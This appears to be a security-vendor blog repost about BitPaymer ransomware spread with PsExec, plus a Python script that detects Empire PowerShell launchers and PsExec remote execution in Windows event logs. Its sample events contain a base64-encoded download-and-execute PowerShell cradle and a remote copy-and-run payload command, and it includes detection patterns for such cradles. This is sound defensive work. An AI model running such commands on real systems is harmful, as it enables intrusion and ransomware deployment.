Attivo Networks Blogs

Threat actors gaining admin rights before ransomware infections

Source: SC Media

Threat actors are using accounts with admin privileges to install BitPaymer ransomware via PsExec, which suggests they are taking a more targeted approach to distributing their malware.

Similar to the Arizona Beverages ransomware attack earlier this month, a manufacturing company also appears to have been targeted in an attack in which the company's name was explicitly mentioned in the ransom note.

This led Trend Micro researchers to believe an account with administrative privileges may have been compromised and used to install BitPaymer via PsExec.

“BitPaymer, which is related to the iEncrypt ransomware, was executed in the manufacturing company’s system using PsExec,” researchers said in an April 15 blog post. “Our analysis revealed that on February 18, 2019 PST, between 9:40 p.m. and 11:03 p.m., commands were sent via PsExec to copy and execute the BitPaymer variant.”

Between January 29 and February 18, threat actors made multiple attempts to run an Empire PowerShell backdoor on several of the machines; these attempts were detected by researchers.

It is possible that one of these attempts resulted in a breach before the ransomware was installed, since researchers said the attacker needed at least one account with administrative privileges in order to run the PsExec commands.
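The three signals described above (an Empire-style encoded PowerShell launcher, a PsExec service being installed on the target, and the remote copy-and-execute commands that follow it) are all visible in standard Windows event logs, and the account requirement the researchers point to can be recovered by correlating the service install with the network logon immediately before it. The following is an added detection example written for this page; it is not code from the SC Media article or from Trend Micro's report. All events are constructed sample records, and the dict field names (`CommandLine`, `ParentImage`, `ServiceName`, `ImagePath`, `LogonType`, `Account`, `SourceIp`) assume a SIEM has already parsed the Windows events into this shape, which is an assumption, not any product's real schema.

```python
"""Added example, not code from the SC Media article or Trend Micro's report.

Detects Empire-style encoded PowerShell launchers (Security 4688 process
creation), PsExec service installs (System 7045), and processes spawned by the
PsExec service, then correlates each service install with the preceding
network logon (Security 4624, logon type 3) that shows which account the
attacker used. Event records are constructed sample data; the field names
assume a SIEM has already parsed the events into dicts (an assumption).
"""
import base64
import re
from datetime import datetime, timedelta

# Empire stagers commonly wrap a download cradle in a hidden-window,
# -EncodedCommand PowerShell launcher. Built here so the base64 is genuine.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/launcher')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()

EVENTS = [  # constructed sample records (hosts, accounts and IPs are invented)
    {"time": "2019-01-29 02:10:00", "host": "WS-17", "id": 4688,
     "CommandLine": f"powershell -NoP -sta -NonI -W Hidden -Enc {ENCODED}"},
    {"time": "2019-02-01 09:00:00", "host": "WS-17", "id": 4688,
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"time": "2019-02-18 12:00:00", "host": "SRV-FILE01", "id": 7045,
     "ServiceName": "ApplicationUpdater",
     "ImagePath": "C:\\Program Files\\Vendor\\updater.exe"},
    {"time": "2019-02-18 21:40:12", "host": "SRV-FILE01", "id": 4624,
     "LogonType": 3, "Account": "CORP\\svc_backup", "SourceIp": "10.0.0.23"},
    {"time": "2019-02-18 21:41:03", "host": "SRV-FILE01", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"time": "2019-02-18 21:41:10", "host": "SRV-FILE01", "id": 4688,
     "ParentImage": "C:\\Windows\\PSEXESVC.exe",
     "CommandLine": "cmd /c copy \\\\10.0.0.23\\share\\payload.exe "
                    "C:\\Windows\\Temp\\ && C:\\Windows\\Temp\\payload.exe"},
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"IEX|Invoke-Expression|Net\.WebClient|DownloadString|FromBase64String", re.I)
HIDDEN = re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def decode_encoded_powershell(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand.
    PowerShell expects the payload as base64 of UTF-16LE text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_empire_style_launcher(cmdline):
    """Hidden window + encoded command + a download/eval cradle inside it."""
    script = decode_encoded_powershell(cmdline)
    return bool(script and CRADLE.search(script) and HIDDEN.search(cmdline))


def is_psexec_service_install(event):
    """PsExec registers PSEXESVC on the target before running commands.
    Note: `psexec -r` renames the service, so the child-process rule below
    is the more robust of the two."""
    if event["id"] != 7045:
        return False
    return (event.get("ServiceName", "").upper() == "PSEXESVC"
            or event.get("ImagePath", "").upper().endswith("PSEXESVC.EXE"))


def is_psexec_child(event):
    """Anything whose parent is the PsExec service was launched remotely."""
    return event["id"] == 4688 and event.get("ParentImage", "").upper().endswith("PSEXESVC.EXE")


def logon_before(events, host, when, window=timedelta(minutes=5)):
    """Most recent network logon (4624, type 3) on host within window before when.
    PsExec needs admin on the target, so this is the account to investigate."""
    cands = [e for e in events
             if e["id"] == 4624 and e["host"] == host and e.get("LogonType") == 3
             and timedelta(0) <= when - _ts(e["time"]) <= window]
    return max(cands, key=lambda e: e["time"], default=None)


def detect(events):
    findings = []
    for e in events:
        if e["id"] == 4688 and is_empire_style_launcher(e.get("CommandLine", "")):
            findings.append({"rule": "empire_launcher", "host": e["host"], "time": e["time"],
                             "script": decode_encoded_powershell(e["CommandLine"])})
        elif is_psexec_service_install(e):
            logon = logon_before(events, e["host"], _ts(e["time"]))
            findings.append({"rule": "psexec_service_install", "host": e["host"], "time": e["time"],
                             "account": logon["Account"] if logon else None,
                             "source_ip": logon["SourceIp"] if logon else None})
        elif is_psexec_child(e):
            findings.append({"rule": "psexec_remote_exec", "host": e["host"], "time": e["time"],
                             "command": e["CommandLine"]})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Run against the sample, the benign service install at noon is ignored, the encoded launcher is decoded back to its cradle, and the PSEXESVC install on SRV-FILE01 is tied to the `CORP\svc_backup` network logon fifty seconds earlier from 10.0.0.23, which is the account and source host an incident responder would pull first.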

Researchers said these infections could have been prevented if the victims had used a managed detection and response (MDR) security service that would allow experts to spot threats before they damage organizations' IT systems.

